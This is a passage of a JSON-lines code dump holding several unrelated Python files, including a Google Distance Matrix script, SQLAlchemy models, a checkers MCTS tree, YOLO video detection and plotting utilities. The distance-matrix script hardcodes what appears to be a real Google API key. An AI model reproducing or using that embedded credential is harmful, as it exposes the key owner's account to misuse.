list_of_sentence_labels_in_file.append(current_sent_labels)\n current_sent_words=[]\n current_sent_labels=[]\n continue\n\n\n (word, gold_label)= line.split(\"\\t\")\n current_sent_words.append(word)\n current_sent_labels.append(gold_label)\n\n return (list_of_sentence_words_in_file, list_of_sentence_labels_in_file)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/baseline_CRF/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500451054","text":"\"\"\"In dit bestand word er een afstands-graaf gemaakt doormiddel van de google distance API.\nHet programma lees een text bestand met adressen uit en krijgt de afstanden tussen deze adressen terug,\ndeze worden vervolgens netjes in een matrix gezet.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom urllib.request import urlopen\nimport urllib\nimport json\n\n\ndef createData(txtFile):\n \"\"\"Maakt een dictionary met alle data zoals API-key & een lijst met adressen\"\"\"\n with open(txtFile, \"r\") as file:\n addresses = [line.strip() for line in file] # Voegt alle adressen toe zonder '\\n'\n data = {'API_key': 'AIzaSyAfYV8HCGn_rETcA1QtHbL_z2WIUXTSawg', 'addresses': addresses}\n return data\n\n\ndef createMatrix(data):\n \"\"\"Deze functie creert de data voor de matrix en geeft deze door aan buildMatrix.\n Dit is de 'hoofdcode' voor deze file, hier komt alles samen\"\"\"\n addresses = data['addresses']\n API_key = data['API_key']\n\n maxAddresses = 100 # Google accepteert maximaal 100 adressen per aanvraag\n numberAddresses = len(addresses)\n maxRows = maxAddresses // numberAddresses\n q, r = divmod(numberAddresses, maxRows)\n destinationAdresses = addresses\n matrix = []\n\n for item in range(q):\n startAddresses = addresses[item * maxRows: (item + 1) * maxRows]\n response = apiRequest(startAddresses, destinationAdresses, API_key)\n matrix += buildMatrix(response)\n\n if r > 0:\n startAddresses = addresses[q * maxRows: q * maxRows + r]\n response = apiRequest(startAddresses, destinationAdresses, API_key)\n matrix += buildMatrix(response)\n return matrix\n\n\ndef apiRequest(start, destination, key):\n \"\"\"Deze functie maakt en verzend een request om de afstand tussen 2 adressen te krijgen\"\"\"\n\n def createRequestString(addresses):\n \"\"\"Deze functie zet de adressen in het goede aanvraag format\"\"\"\n requestString = ''\n for number in range(len(addresses) - 1):\n requestString += addresses[number] + '|' # voegt '|' tussen de adressen\n requestString += addresses[-1]\n return requestString\n\n requestURL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=metric'\n startString = createRequestString(start)\n destinationString = createRequestString(destination)\n request = requestURL + '&origins=' + startString + '&destinations=' + \\\n destinationString + '&key=' + key\n result = urllib.request.urlopen(request).read() # Doet de API request\n return json.loads(result)\n\n\ndef buildMatrix(response):\n \"\"\"Deze functie bouwt de matrix op vanuit de data uit createMatrix\"\"\"\n\n matrix = []\n for row in response['rows']:\n row_list = [row['elements'][j]['distance']['value'] for j in range(len(row['elements']))]\n matrix.append(row_list)\n return matrix\n\n\ndef main(txtFile):\n \"\"\"Je roept deze functie aan om een graaf te creeren via de google api\"\"\"\n\n data = createData(txtFile)\n distanceMatrix = createMatrix(data)\n return distanceMatrix\n\n\nif __name__ == '__main__':\n distMatrix = main(\"Adresses.txt\")\n for matrixRow in distMatrix:\n print(matrixRow)\n","sub_path":"Source/createGraph.py","file_name":"createGraph.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167174651","text":"from sqlalchemy import *\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\n\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n## BELOW = CREATING MY TABLES\nclass City(Base):\n __tablename__ = 'city'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n state = Column(Text)\n city_ = relationship('Teams')\n\n\nclass Sports(Base):\n __tablename__ = 'sports'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n sport_ = relationship('Teams')\n\n\nclass Teams(Base):\n __tablename__ = 'teams'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n\n teams_ = relationship('Players')\n\n city_id = Column(Integer, ForeignKey('city.id')) #this one\n city = relationship(City, back_populates='city_')\n\n sport_id = Column(Integer, ForeignKey('sports.id')) #this one\n sport = relationship(Sports, back_populates='sport_')\n\n\nclass Players(Base):\n __tablename__ = 'players'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n number = Column(Integer, default=None)\n height = Column(Text)\n weight = Column(Float)\n age = Column(Text)\n team_id = Column(Integer, ForeignKey('teams.id')) # this one\n team = relationship(Teams, back_populates='teams_')\n\n\n##### BELOW = INSTANTIATING MY OBJECTS\n# engine = create_engine('sqlite:///sports.db')\n# Base.metadata.create_all(engine)\n#\n#\n# Session = sessionmaker(bind=engine)\n# session = Session()\n#\n# nyc = City(name='New York City', state='New York')\n# la = City(name='Los Angeles', state='California' )\n#\n# bball = Sports(name='Basketball')\n# baseball = Sports(name='Baseball')\n#\n# session.add_all([la,nyc,bball,baseball])\n# session.commit()\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634071240","text":"from neuralnetwork import *\nfrom threading import Lock\n\n# the permanent tree data structure\nclass PermaTree:\n def __init__(self, checker, is_cuda):\n self.is_cuda = is_cuda\n self.node_count = 0\n self.root = PermaNode(self, checker.state)\n self.last_capture = 0\n\n def move_root(self, node):\n # move from root to a immediate child\n # update parent to None\n if not node.is_root():\n if node.from_edge.is_capture:\n self.last_capture = 0\n else:\n self.last_capture += 1\n self.root = node\n self.root.parent = None\n\n # def update(self, edge):\n # pass\n #\n # def update(self, node):\n # pass\n\n\nclass PermaEdge:\n \"\"\"\n Guarantees that from_node and to_node are not None\n \"\"\"\n\n def __init__(self, perma_tree, action, from_node):\n self.perma_tree = perma_tree\n # an Action object of the checker program\n self.action = action\n # a Node object for where the action comes from\n self.from_node = from_node\n # initialize node whenever an edge is created, guarantees the data structure property\n self.to_node = PermaNode(perma_tree, action.get_flipped_state(), self.from_node, self)\n self.is_capture = action.is_capture\n # self.to_node = None # create new child node in expand() and update this\n\n # # these values are initialized at expand() and updated in backup()\n self.visit_count = 0\n self.total_action_value = 0\n self.mean_action_value = 0\n # from neural network queue\n self.value = None\n self.logit = None\n # computed after the from_node is ready\n self.prior_probability = None\n\n def checker_to_tensor(self):\n return binary_board(self.to_node.checker_state.board)\n\n def assign_value(self, nn):\n tensors = states_to_batch_tensor([self.to_node.checker_state], self.perma_tree.is_cuda)\n value = nn(tensors)\n self.value = value.cpu().numpy().tolist()[0][0]\n return value\n\nclass PermaNode:\n \"\"\"\n Guarantees that from_edge is not None. May not have self.edges\n \"\"\"\n\n def __init__(self, perma_tree, checker_state, parent=None, from_edge=None):\n self.perma_tree = perma_tree\n # every element in self.edges is an Edge object\n self.checker_state = checker_state\n self.parent = parent # parent is an edge, None when root\n self.from_edge = from_edge\n # adjacency list implementation\n self.edges = []\n # locked if the children prior probability is being calculated by the neural network or selection is in progress\n self.lock = Lock()\n self.unassigned=0\n self.probability_ready=False\n perma_tree.node_count += 1\n\n def is_leaf(self):\n return len(self.edges) == 0\n\n def is_root(self):\n return self.from_edge is None\n\n def construct_edges(self):\n \"\"\"\n\n :return: there are no edges\n \"\"\"\n # call get_legal_actions from checker\n actions, _ = self.checker_state.get_legal_actions()\n if len(actions) == 0:\n return True\n # init and add edges into node\n for action in actions:\n new_edge = PermaEdge(self.perma_tree, action, self) # prior_prob will be updated in expand()\n self.edges.append(new_edge)\n return False\n\n def get_children_checker_states(self):\n return [edge.to_node.checker_state for edge in self.edges]\n\n def put_children_on_nn_queue(self, nn_queue):\n \"\"\"\n self is a leaf node that is being expanded\n This function will asynchronously assign the child edge value and prior probability\n A worker thread with neural network is constantly scanning the nn_queue to assign edges in batch\n :param parallel_nn_queue:\n :return:\n \"\"\"\n self.lock.acquire()\n for edge in self.edges:\n self.unassigned+=1\n nn_queue.put(edge)\n\n def find_child(self, state):\n for child in [e.to_node for e in self.edges]:\n if child.checker_state.board_hash() == state.board_hash():\n return child\n\n #\n # # this lock will be released when all of its children are evaluated\n # states = [edge.to_node.checker_state for edge in self.edges]\n # input_tensor = states_to_batch_tensor(states, self.perma_tree.is_cuda)\n # value_tensor = nn(input_tensor)\n # value_array = value_tensor.cpu().numpy()\n # value_array = np.squeeze(value_array, axis=1)\n # value_list = value_array.tolist()\n # for edx, edge in enumerate(self.edges):\n # edge.value = value_list[edx]\n #\n # # initialize the prior probability of all children\n # p = nn.children_values_to_probability(value_tensor)\n # # assert that all edges must not be shuffled\n # # this should only be used for MCTS, not training. no gradient is here.\n # npp = p.cpu().numpy().tolist()\n # for edx, edge in enumerate(self.edges):\n # edge.prior_probability = npp[edx]\n\n\n def is_first_player(self):\n return not self.checker_state.flipped","sub_path":"demodir/yesterday/permatree.py","file_name":"permatree.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631878050","text":"MONGO_HOST = 'localhost'\nMONGO_PORT = 27017\n\nMONGO_DBNAME = 'materials'\n\n# Enable reads (GET), inserts (POST) and DELETE for resources/collections\n# (if you omit this line, the API will default to ['GET'] and provide\n# read-only access to the endpoint).\nRESOURCE_METHODS = ['GET', 'POST', 'DELETE']\n\n# Enable reads (GET), edits (PATCH), replacements (PUT) and deletes of\n# individual items (defaults to read-only item access).\nITEM_METHODS = ['GET', 'PATCH', 'PUT', 'DELETE']\n\n# Disables concurrency control\n# When enabled, ETag is required value within If-Match HTTP header\n# Stops race conditions (which we'll ignore for now for testing purposes)\nIF_MATCH = False","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351478463","text":"import py\n\nprint(dir(py))\n\n\ns = py.Seed()\nprint(\"seed\", s.getOwner())\n\ncoord = py.CubeCoord(1, 1, 1)\ncell = py.Cell(0)\nb = py.Board({coord: cell})\nprint(\"board\", b.coords, b.map)\nprint(b.coords[0].getOpposite())\n\ncm = py.CommandManager()\n\nprint(dir(py.exception))\n# from py.exception.CellNotValidException import CellNotValidException\n# raise py.exception.CellNotValidException.CellNotValidException(37)\n\nr = py.Referee()\nr.init()\n\n# exit()\n\n# ------\n\nfrom py.java.compat import Collections, Random\n\nr = Random(seed=1337)\n\nL = [i for i in range(10)]\nprint(L) # [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nCollections.shuffle(L, r)\nprint(L) # [3, 4, 1, 8, 7, 6, 0, 2, 5, 9]\n\n# --\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560957525","text":"def solution(tickets):\n answer = []\n stack = []\n visited = [0] * len(tickets)\n begin = 'ICN'\n\n # end = tickets[0][1]\n stack.append(begin)\n answer.append(begin)\n\n answer = graph(tickets, stack, visited, answer)\n return answer\n\n\ndef graph(tickets, stack, visited, answer):\n while stack:\n begin = stack.pop(0)\n begin_candidate = []\n for i in range(len(tickets)):\n if visited[i] == 0:\n if begin == tickets[i][0]:\n begin_candidate.append([tickets[i][1], i])\n else:\n continue\n if len(begin_candidate) == 1:\n idx = begin_candidate[0][1]\n visited[idx] = 1\n stack.append(tickets[idx][1])\n answer.append(tickets[idx][1])\n\n elif len(begin_candidate) > 1:\n begin_candidate.sort()\n idx = begin_candidate[0][1]\n visited[idx] = 1\n stack.append(tickets[idx][1])\n answer.append(tickets[idx][1])\n\n else:\n continue\n print(stack, 'stack')\n print(answer)\n return answer\n\ntickets = [[\"ICN\", \"BBB\"], [\"ICN\", \"CCC\"], [\"BBB\", \"CCC\"], [\"CCC\", \"BBB\"], [\"CCC\", \"ICN\"]]\nsolution(tickets)","sub_path":"김용재/211120 여행경로.py","file_name":"211120 여행경로.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510232277","text":"import cv2\nimport numpy as np\n\nimport time\nimport sys\n\nCONFIDENCE = 0.5\nSCORE_THRESHOLD = 0.5\nIOU_THRESHOLD = 0.5\nconfig_path = \"cfg/yolov3.cfg\"\nweights_path = \"weights/yolov3.weights\"\nfont_scale = 1\nthickness = 1\nlabels = open(\"data/coco.names\").read().strip().split(\"\\n\")\ncolors = np.random.randint(0, 255, size=(len(labels), 3), dtype=\"uint8\")\n\nnet = cv2.dnn.readNetFromDarknet(config_path, weights_path)\n\nln = net.getLayerNames()\ntry:\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nexcept IndexError:\n # in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available\n ln = [ln[i - 1] for i in net.getUnconnectedOutLayers()]\n# read the file from the command line\nvideo_file = sys.argv[1]\ncap = cv2.VideoCapture(video_file)\n_, image = cap.read()\nh, w = image.shape[:2]\nfourcc = cv2.VideoWriter_fourcc(*\"XVID\")\nout = cv2.VideoWriter(\"output.avi\", fourcc, 20.0, (w, h))\nwhile True:\n _, image = cap.read()\n\n h, w = image.shape[:2]\n blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)\n net.setInput(blob)\n start = time.perf_counter()\n layer_outputs = net.forward(ln)\n time_took = time.perf_counter() - start\n print(\"Time took:\", time_took)\n boxes, confidences, class_ids = [], [], []\n\n # loop over each of the layer outputs\n for output in layer_outputs:\n # loop over each of the object detections\n for detection in output:\n # extract the class id (label) and confidence (as a probability) of\n # the current object detection\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n # discard weak predictions by ensuring the detected\n # probability is greater than the minimum probability\n if confidence > CONFIDENCE:\n # scale the bounding box coordinates back relative to the\n # size of the image, keeping in mind that YOLO actually\n # returns the center (x, y)-coordinates of the bounding\n # box followed by the boxes' width and height\n box = detection[:4] * np.array([w, h, w, h])\n (centerX, centerY, width, height) = box.astype(\"int\")\n\n # use the center (x, y)-coordinates to derive the top and\n # and left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n\n # update our list of bounding box coordinates, confidences,\n # and class IDs\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n # perform the non maximum suppression given the scores defined before\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)\n\n font_scale = 1\n thickness = 1\n\n # ensure at least one detection exists\n if len(idxs) > 0:\n # loop over the indexes we are keeping\n for i in idxs.flatten():\n # extract the bounding box coordinates\n x, y = boxes[i][0], boxes[i][1]\n w, h = boxes[i][2], boxes[i][3]\n # draw a bounding box rectangle and label on the image\n color = [int(c) for c in colors[class_ids[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)\n text = f\"{labels[class_ids[i]]}: {confidences[i]:.2f}\"\n # calculate text width & height to draw the transparent boxes as background of the text\n (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]\n text_offset_x = x\n text_offset_y = y - 5\n box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))\n overlay = image.copy()\n cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)\n # add opacity (transparency to the box)\n image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)\n # now put the text (label: confidence %)\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=font_scale, color=(0, 0, 0), thickness=thickness)\n\n out.write(image)\n cv2.imshow(\"image\", image)\n \n if ord(\"q\") == cv2.waitKey(1):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"machine-learning/object-detection/read_video.py","file_name":"read_video.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481424074","text":"import io\nimport json\nimport socket\nfrom typing import Dict, Tuple, Union\n\nimport boto3\nimport pytest\nimport yaml\nfrom botocore.client import BaseClient\nfrom botocore.response import StreamingBody\nfrom botocore.session import Session\nfrom botocore.stub import Stubber\nfrom pydantic import BaseModel, ValidationError\nfrom pytest_mock import MockerFixture\n\nfrom pydantic_appconfig import AppConfigHelper\n\n\nclass TestConfig(BaseModel):\n \"\"\"Test pydantic parsing.\"\"\"\n\n __test__ = False\n\n test_field_string: str\n test_field_int: int\n\n class Config:\n \"\"\"The config, including title for the JSON schema.\"\"\"\n\n title = \"TestConfig\"\n\n\ndef test_config_returned_as_model(\n appconfig_stub: Tuple[BaseClient, Stubber, Session],\n mocker: MockerFixture,\n) -> None:\n \"\"\"Tests the config gets updated.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"test_field_string\": \"testing_string\",\n \"test_field_int\": 42,\n },\n \"1\",\n \"application/json\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n \"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n assert a.config.test_field_string == \"testing_string\"\n assert a.config.test_field_int == 42\n assert a.config_version == \"1\"\n\n\ndef test_yaml_config_returned_as_model(\n appconfig_stub: Tuple[BaseClient, Stubber, Session],\n mocker: MockerFixture,\n) -> None:\n \"\"\"Tests the config gets updated.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"test_field_string\": \"testing_string\",\n \"test_field_int\": 42,\n },\n \"1\",\n \"application/x-yaml\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n \"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n assert a.config.test_field_string == \"testing_string\"\n assert a.config.test_field_int == 42\n assert a.config_version == \"1\"\n\n\ndef test_config_model_parse_error(\n appconfig_stub: Tuple[BaseClient, Stubber, Session], mocker: MockerFixture\n) -> None:\n \"\"\"Tests the config rejected.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"xxx\": \"testing_string\",\n },\n \"1\",\n \"application/json\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n \"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n with pytest.raises(ValidationError):\n assert a.config.test_field_string\n\n\ndef _build_request(\n app: str = \"AppConfig-App\",\n env: str = \"AppConfig-Env\",\n profile: str = \"AppConfig-Profile\",\n client_id: str = None,\n version: str = \"null\",\n) -> Dict[str, str]:\n if client_id is None:\n client_id = socket.gethostname()\n return {\n \"Application\": app,\n \"ClientConfigurationVersion\": str(version),\n \"ClientId\": client_id,\n \"Configuration\": profile,\n \"Environment\": env,\n }\n\n\ndef _build_response(\n content: Union[Dict, str], version: str, content_type: str\n) -> Dict[str, Union[str, StreamingBody]]:\n if content_type == \"application/json\":\n content_text = json.dumps(content).encode(\"utf-8\")\n elif content_type == \"application/x-yaml\":\n content_text = str(yaml.dump(content)).encode(\"utf-8\")\n elif not isinstance(content, str):\n raise ValueError(\"Unrecognised content.\")\n else:\n content_text = content.encode(\"utf-8\")\n return {\n \"Content\": StreamingBody(io.BytesIO(bytes(content_text)), len(content_text)),\n \"ConfigurationVersion\": version,\n \"ContentType\": content_type,\n }\n","sub_path":"tests/test_pydantic_config.py","file_name":"test_pydantic_config.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594485490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 04 13:58:30 2015\n\n@author: Andrew Lawson\n@email: al1g13@soton.ac.uk\n\nName: plotting.py\nPurpose: All-purpose functions for plotting correlators.\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport fitting\n\n\nclass PlotParms:\n \"\"\"\n Class: PlotParms\n Purpose: Track plot parameters.\n \"\"\"\n _markers = ['o', '^', 's', 'x', 'v', '+']\n _point_cols = ['b', 'g', 'r', 'k', 'm', 'c']\n _line_cols = ['g', 'm', 'c', 'r', 'b', 'k']\n\n marker_index = 0\n point_index = 0\n line_index = 0\n\n def __init__(self):\n \"\"\"New PlotParms instance\"\"\"\n self.reset()\n return\n\n def get_next_marker(self):\n \"\"\"Scatter plot point marker\"\"\"\n marker = self._markers[self.marker_index]\n self.marker_index = (self.marker_index + 1) % len(self._markers)\n return marker\n\n def get_next_point_col(self):\n \"\"\"Colour of scatter points.\"\"\"\n point_col = self._point_cols[self.point_index]\n self.point_index = (self.point_index + 1) % len(self._point_cols)\n return point_col\n\n def get_next_line_col(self):\n \"\"\"Colour of fit line.\"\"\"\n line_col = self._line_cols[self.line_index]\n self.line_index = (self.line_index + 1) % len(self._line_cols)\n return line_col\n\n def reset(self, index=0):\n self.marker_index = index\n self.point_index = index\n self.line_index = index\n\nGLOB_PLOT_PARMS = PlotParms()\n\ndef plot_with_errors(x, y, yerr, col='b', label=None, xerr=None, marker='o',\n markersize=4, xlabel=None, ylabel=None, ax=None,\n show=False):\n \"\"\"\n Name: plot_with_errors\n Parameters: x - the data along the x axis.\n y - the data along the y axis.\n yerr - error in the y data.\n col - colour to use in plot.\n label - label of plot.\n Returns: None.\n Purpose: Scatter plot of y against x data with y errors included.\n \"\"\"\n #plt.scatter(x, y, c=col, marker=marker, markersize=3)\n fmt = col + marker\n if ax is None:\n plot = plt.errorbar(x, y, yerr=yerr, xerr=xerr, fmt=fmt,\n markersize=markersize, label=label)\n else:\n plot = ax.errorbar(x, y, yerr=yerr, xerr=xerr, fmt=fmt,\n markersize=markersize, label=label)\n if xlabel is not None:\n plt.xlabel(xlabel)\n if ylabel is not None:\n plt.ylabel(ylabel)\n\n if show is True:\n plt.show()\n return\n else:\n return plot\n\n\ndef plot_fit_with_errors(correlator, fit_func, fit_func_label,\n fitted_params, jackknife_params,\n limits, N_t, param_return_func=None,\n errors=None, calc_errs=True,\n corr_manip_func=None, avg_manip_parms=None,\n jack_manip_parms=None, manip_func_args=[],\n bootstrap=True,\n corr_label=None, fit_label=None, fig_name=None,\n xlabel=None, ylabel=None, point_col='b', line_col='g',\n err_col='#3F7F4C', shade_col='#7EFF99',\n split_t_J=False, log_scale=True, legend_loc=1,\n xlim=None, ylim=None, set_ylim=False, show=True,\n fit_lims=[], pass_fit=False,\n marker='o', markersize=4, ax=None):\n \"\"\"\n Name: plot_fit_with_errors\n Purpose: Plot a correlator, its asymptotic fit function and associated\n errors.\n \"\"\"\n #==========================================================================\n # Initialise variables.\n #==========================================================================\n N_cf = len(jackknife_params)\n low = limits[0][0]\n high = limits[0][1]\n if split_t_J is True:\n t_J = limits[1]\n t = np.arange(low, high)\n\n if len(fit_lims) == 0:\n fit_lims = [low, high]\n\n limits[0] = fit_lims\n x = np.arange(fit_lims[0], fit_lims[1])\n\n if ax is not None:\n axes = ax\n else:\n axes = plt\n\n #==========================================================================\n # Plot the average measured correlator and respective error bars.\n #==========================================================================\n if errors is None and calc_errs is True:\n #======================================================================\n # If errors are to be calculated, then compute them here.\n #======================================================================\n if corr_manip_func is not None:\n avg, err = \\\n fitting.avg_across_time_with_jack_fit(correlator,\n avg_manip_parms,\n jack_manip_parms,\n corr_manip_func,\n manip_func_args)\n else:\n avg, err = fitting.avg_across_time_slices(correlator,\n bootstrap=bootstrap)\n else:\n #======================================================================\n # Otherwise errors should have been passed to the function.\n #======================================================================\n avg = correlator\n err = errors\n\n if log_scale is True:\n axes.scatter(t, np.abs(avg[low:high]), c=point_col, marker=marker)\n fmt_str = point_col + 'o'\n axes.errorbar(t, np.abs(avg[low:high]), yerr=err[low:high],\n fmt=fmt_str, label=corr_label, marker=marker,\n markersize=markersize)\n else:\n axes.scatter(t, avg[low:high], c=point_col, marker=marker)\n fmt_str = point_col + 'o'\n axes.errorbar(t, avg[low:high], yerr=err[low:high],\n fmt=fmt_str, label=corr_label, marker=marker,\n markersize=markersize)\n\n #==========================================================================\n # Construct the ground state fits.\n #==========================================================================\n if param_return_func is not None:\n fit_params = param_return_func(fitted_params, fit_func_label)\n else:\n fit_params = fitted_params\n\n try:\n y = fit_func(limits, fit_params)\n except TypeError:\n y = fit_func(limits, *fit_params)\n\n y_len = len(y)\n if log_scale is True:\n y = np.abs(y)\n\n #==========================================================================\n # Compute jackknife errors on the ground state fits.\n #==========================================================================\n y_arr = np.zeros((N_cf, y_len))\n\n for ii in range(N_cf):\n if param_return_func is not None:\n fit_params = param_return_func(jackknife_params[ii], fit_func_label)\n else:\n fit_params = jackknife_params[ii]\n try:\n y_arr[ii] = fit_func(limits, *fit_params)\n except TypeError:\n y_arr[ii] = fit_func(limits, fit_params)\n\n y_err = np.std(y_arr, axis=0)\n del y_arr\n if bootstrap is False:\n y_err *= np.sqrt(N_cf)\n\n #==========================================================================\n # Plot the correlators and their ground state contributions.\n #==========================================================================\n if split_t_J is True and pass_fit is False:\n axes.plot(x[:t_J], y[:t_J], c=line_col, label=fit_label)\n axes.fill_between(x[:t_J], y[:t_J] - y_err[:t_J], y[:t_J] + y_err[:t_J],\n alpha=0.2, edgecolor=err_col, facecolor=shade_col)\n axes.plot(x[t_J + 1:], y[t_J + 1:], c=line_col)\n axes.fill_between(x[t_J + 1:], y[t_J + 1:] - y_err[t_J + 1:],\n y[t_J + 1:] + y_err[t_J + 1:], alpha=0.2,\n edgecolor=err_col, facecolor=shade_col)\n elif pass_fit is True:\n pass\n else:\n axes.plot(x, y, c=line_col, label=fit_label)\n axes.fill_between(x, y - y_err, y + y_err, alpha=0.2,\n edgecolor=err_col, facecolor=shade_col)\n\n if log_scale is True:\n axes.yscale('log')\n\n #if fit_func_label is not None and log_scale is True:\n # ymin = 0.7 * y.min()\n # ymax = 1.1 * y.max()\n # plt.ylim([ymin, ymax])\n\n if xlim is not None:\n if ax is not None:\n ax.set_xlim(xlim)\n else:\n plt.xlim(xlim)\n else:\n if ax is not None:\n ax.set_xlim([low - 1, high + 1])\n else:\n plt.xlim([low - 1, high + 1])\n if ylim is not None:\n if ax is not None:\n ax.set_ylim(ylim)\n else:\n plt.ylim(ylim)\n\n elif set_ylim is True:\n # Use default y limits. Top 10% and bottom 10% of graph should be\n # black space.\n y_high = avg.max() + err.max()\n y_low = avg.min() - err.max()\n interval = y_high - y_low\n full_interval = interval / 0.8\n gap = (full_interval - interval) / 2.0\n if ax is not None:\n ax.set_ylim([y_low - gap, y_high + gap])\n else:\n plt.ylim([y_low - gap, y_high + gap])\n\n if ylabel is not None:\n if ax is not None:\n ax.set_ylabel(ylabel)\n else:\n plt.ylabel(ylabel)\n if xlabel is not None:\n if ax is not None:\n ax.set_xlabel(xlabel)\n else:\n plt.xlabel(xlabel)\n if fit_label is not None or corr_label is not None:\n axes.legend(loc=legend_loc)\n if fig_name is not None:\n plt.savefig(fig_name)\n if show is True:\n plt.show()\n plt.close()\n\n return\n\ndef plot_error_band(x, y, y_err, edgecolor='b', facecolor='b',\n plot_lines=True, line_col='b', label=None,\n show=False):\n if plot_lines is True:\n plt.plot(x, y - y_err, c=line_col, label=label)\n plt.plot(x, y + y_err, c=line_col)\n\n plt.fill_between(x, y - y_err, y + y_err, alpha=0.6,\n edgecolor=edgecolor, facecolor=facecolor)\n\n if show is True:\n plt.show()\n\n return\n\n \ndef add_preliminary_overlay(ax):\n \"\"\"\n Name: add_preliminary_overlay\n Parameters: ax - the axis over which to make the preliminary overlay.\n Returns: None.\n Purpose: Overlay the word \"PRELIMINARY\" on a plot.\n \"\"\"\n ax.text(0.5, 0.5, \"PRELIMINARY\", rotation=45, rotation_mode='anchor',\n ha='center', va='center', zorder=1000,\n fontdict=dict(fontsize=48, color='gray', alpha=0.2),\n transform=ax.transAxes)\n return\n \n \ndef make_jackknife_histogram(jack_results, N_bins=20, fig_name=None, col='b'):\n bin_arr = np.zeros(N_bins)\n bin_min = np.min(jack_results)\n bin_max = np.max(jack_results)\n bin_interval = (bin_max - bin_min) / float(N_bins)\n\n for parm in jack_results:\n for jj in range(N_bins):\n if (parm - bin_min) < (jj + 1) * bin_interval:\n bin_arr[jj] += 1\n break\n\n #bin_bounds = np.arange(N_bins) * bin_interval + bin_min\n bin_bounds = np.arange(N_bins)\n plt.bar(bin_bounds, bin_arr, c=col)\n if fig_name is not None:\n plt.savefig(fig_name)\n plt.show()\n\n\ndef generate_table_from_plot(fig=None, xshift=0, x_header=r\"$t$\",\n y_headers=[], latex=False):\n \"\"\"\n Name: generate_table_from_plot\n Purpose: Print a LaTeX table of the plotted data.\n \"\"\"\n #==========================================================================\n # Extract data from the plot.\n #==========================================================================\n if fig is None:\n lines = plt.gca().lines\n else:\n lines = []\n for ax in fig.axes:\n for obj in ax.lines:\n lines.append(obj)\n xs = []\n ys = []\n yerrs = []\n num_plots = len(lines) / 4\n for ii in range(num_plots):\n plot_num = 4 * ii\n xs.append(lines[plot_num].get_xdata())\n y_1 = 